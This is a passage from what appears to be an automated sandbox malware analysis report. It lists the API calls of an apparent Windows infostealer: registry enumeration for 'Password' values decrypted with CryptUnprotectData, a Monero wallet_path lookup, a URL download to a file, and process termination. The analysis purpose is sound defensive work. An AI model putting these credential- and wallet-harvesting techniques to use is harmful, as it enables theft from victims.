                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 4230089145-0
                                  • Opcode ID: f6e4a4f73c330d0f06453037c99c727033a2077595dbc0ab665d3478b637e534
                                  • Instruction ID: 815bdf5185eddc53fbd658c6337c5745c788a1c32a926e98b9e793db99444ced
                                  • Opcode Fuzzy Hash: f6e4a4f73c330d0f06453037c99c727033a2077595dbc0ab665d3478b637e534
                                  • Instruction Fuzzy Hash: 0061AF7191011CABCB16DB64DC48ADE77F8BF58301F5049A5BA09A7350DF70AF89AFA0
                                  Function 00346AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00346AFF
                                  • InternetOpenA.WININET(0036CFEC,00000001,00000000,00000000,00000000), ref: 00346B2C
                                  • StrCmpCA.SHLWAPI(?,00FAE3C0), ref: 00346B4A
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00346B6A
                                  • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00346B88
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00346BA1
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00346BC6
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00346BF0
                                  • CloseHandle.KERNEL32(00000000), ref: 00346C10
                                  • InternetCloseHandle.WININET(00000000), ref: 00346C17
                                  • InternetCloseHandle.WININET(?), ref: 00346C21
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                  • String ID:
                                  • API String ID: 2500263513-0
                                  • Opcode ID: 66e313e5399e63697eb524794e1e2f170e398d1e14664a98affd35dfac3ad1ad
                                  • Instruction ID: 3f268747ba28e53ee3834e3a02014b5c18264032ee334709e2970c3cb6f67f1d
                                  • Opcode Fuzzy Hash: 66e313e5399e63697eb524794e1e2f170e398d1e14664a98affd35dfac3ad1ad
                                  • Instruction Fuzzy Hash: 3A419271A50205ABDB25DF64EC4AFAE77BCEB14700F004454FA09EB280DF70BD449BA5
                                  Function 00364500 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 95memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00354F39), ref: 00364545
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0036454C
                                  • wsprintfW.USER32 ref: 0036455B
                                  • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 003645CA
                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 003645D9
                                  • CloseHandle.KERNEL32(00000000,?,?), ref: 003645E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                  • String ID: 9O5$%hs$9O5
                                  • API String ID: 885711575-1443274247
                                  • Opcode ID: 1d6efe8a487c9d0ab91a21480905fe562cef30b257049822bdaf2fc465dc61ed
                                  • Instruction ID: ec9e5f4205aa8acea7ef67d103975ecd6abff18aec4cf6be0f89bba88ec56426
                                  • Opcode Fuzzy Hash: 1d6efe8a487c9d0ab91a21480905fe562cef30b257049822bdaf2fc465dc61ed
                                  • Instruction Fuzzy Hash: 1331B172A40205BBDB11DBE0EC49FEEB778FF55700F104055FA0AE7184DB70AA859BA5
                                  Function 0034BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034BC1F
                                  • lstrlen.KERNEL32(00000000), ref: 0034BC52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034BC7C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034BC84
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034BCAC
                                  • lstrlen.KERNEL32(00374AD4), ref: 0034BD23
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 85715c14effc143a623728a8df86eb4fd39ef9d4dfbe8d3f432bd2b5d2a65d05
                                  • Instruction ID: 34332e81395a1d9be825e39ddb40a47a73e4837df031a1e18b207d10c1c22472
                                  • Opcode Fuzzy Hash: 85715c14effc143a623728a8df86eb4fd39ef9d4dfbe8d3f432bd2b5d2a65d05
                                  • Instruction Fuzzy Hash: 9BA19230A002058FCB26DF24E989A6EB7F4AF45304F5984A9F809EF361DB31EC55DB60
                                  Function 00365EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00365F2A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00365F49
                                  • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00366014
                                  • memmove.MSVCRT(00000000,00000000,?), ref: 0036609F
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003660D0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$memmove
                                  • String ID: invalid string position$string too long
                                  • API String ID: 1975243496-4289949731
                                  • Opcode ID: c4f4cdbab6bb5205407dfade9dfcfee462c4bc4f87ae2b28bb843323cd33c6f1
                                  • Instruction ID: 641d93b46609dd4d8bf4174e6c3971fdcfe7646d62e588bc8a23c1af1b18b786
                                  • Opcode Fuzzy Hash: c4f4cdbab6bb5205407dfade9dfcfee462c4bc4f87ae2b28bb843323cd33c6f1
                                  • Instruction Fuzzy Hash: C761A370714604DBDB1ACF5CCC9596EB7BAEF84344B24CA29E492CB789C731ED808B55
                                  Function 0035E049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035E07D
                                  • lstrcat.KERNEL32(?,?), ref: 0035E098
                                  • lstrcat.KERNEL32(?,?), ref: 0035E0AC
                                  • lstrcat.KERNEL32(?,00F9AF90), ref: 0035E0C0
                                  • lstrcat.KERNEL32(?,?), ref: 0035E0D4
                                  • lstrcat.KERNEL32(?,00FAD4B0), ref: 0035E0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0035E126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFile
                                  • String ID:
                                  • API String ID: 3428472996-0
                                  • Opcode ID: 74dd28f08c55cb8ed5a928d4a6f156333376dca2373f22609271e237ebb768ca
                                  • Instruction ID: db69078057cd402e19b55cc816ae3134057bb6f5b8564fdc9cc16b17d765b9cc
                                  • Opcode Fuzzy Hash: 74dd28f08c55cb8ed5a928d4a6f156333376dca2373f22609271e237ebb768ca
                                  • Instruction Fuzzy Hash: EF41B171D1011C9BCB26EB64DC48ADE73B4BF58311F5049A4F90AAB250DF30AF899FA0
                                  Function 00347A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003477D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00347805
                                    • Part of subcall function 003477D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0034784A
                                    • Part of subcall function 003477D0: StrStrA.SHLWAPI(?,Password), ref: 003478B8
                                    • Part of subcall function 003477D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 003478EC
                                    • Part of subcall function 003477D0: HeapFree.KERNEL32(00000000), ref: 003478F3
                                  • lstrcat.KERNEL32(00000000,00374AD4), ref: 00347A90
                                  • lstrcat.KERNEL32(00000000,?), ref: 00347ABD
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00347ACF
                                  • lstrcat.KERNEL32(00000000,?), ref: 00347AF0
                                  • wsprintfA.USER32 ref: 00347B10
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00347B39
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00347B47
                                  • lstrcat.KERNEL32(00000000,00374AD4), ref: 00347B60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                  • String ID: :
                                  • API String ID: 398153587-3653984579
                                  • Opcode ID: 055b535074f93bb6107e66c51f1c25445cd6e801543df298ec40b080a25821e8
                                  • Instruction ID: 8493a0aa58b0c4f2c5ed848da5df4634b34471cc50e39115e5c3981cac793db1
                                  • Opcode Fuzzy Hash: 055b535074f93bb6107e66c51f1c25445cd6e801543df298ec40b080a25821e8
                                  • Instruction Fuzzy Hash: 3F31C972A54214EFCB12DF64EC4C9AFB7B9EB94710B154519E90D97300DB70F984EBA0
                                  Function 003581B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 0035820C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00358243
                                  • lstrlen.KERNEL32(00000000), ref: 00358260
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00358297
                                  • lstrlen.KERNEL32(00000000), ref: 003582B4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003582EB
                                  • lstrlen.KERNEL32(00000000), ref: 00358308
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00358337
                                  • lstrlen.KERNEL32(00000000), ref: 00358351
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00358380
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 5531dd07f1e241bdaf82bef086b2febeb9ead9f15ba49e2e22e182f986aa11e7
                                  • Instruction ID: 2d8da6b81a579dac546c45d373bf1e0b34c5c82205ad297801c2f7c945c46cf9
                                  • Opcode Fuzzy Hash: 5531dd07f1e241bdaf82bef086b2febeb9ead9f15ba49e2e22e182f986aa11e7
                                  • Instruction Fuzzy Hash: C9516A799016029BDB12DF28D858A6BBBB8EF04701F124564FD06EB254EF30ED65CBE0
                                  Function 003477D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00347805
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0034784A
                                  • StrStrA.SHLWAPI(?,Password), ref: 003478B8
                                    • Part of subcall function 00347750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0034775E
                                    • Part of subcall function 00347750: RtlAllocateHeap.NTDLL(00000000), ref: 00347765
                                    • Part of subcall function 00347750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0034778D
                                    • Part of subcall function 00347750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003477AD
                                    • Part of subcall function 00347750: LocalFree.KERNEL32(?), ref: 003477B7
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003478EC
                                  • HeapFree.KERNEL32(00000000), ref: 003478F3
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00347A35
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                  • String ID: Password
                                  • API String ID: 356768136-3434357891
                                  • Opcode ID: ed34c642eac49e8d47b5a097ace46c0db829391af4889df14938c490519e9bb6
                                  • Instruction ID: 8a343c2a802e91661adc869f6b41a0bd12c03096ad16912473888a7a2a3b521e
                                  • Opcode Fuzzy Hash: ed34c642eac49e8d47b5a097ace46c0db829391af4889df14938c490519e9bb6
                                  • Instruction Fuzzy Hash: 467121B1D0021DAFDB11DF95DC819EEB7F9EF44300F144569E509AB240EB356A85CFA0
                                  Function 00341120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00341135
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0034113C
                                  • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00341159
                                  • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00341173
                                  • RegCloseKey.ADVAPI32(?), ref: 0034117D
                                  Strings
                                  • SOFTWARE\monero-project\monero-core, xrefs: 0034114F
                                  • wallet_path, xrefs: 0034116D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
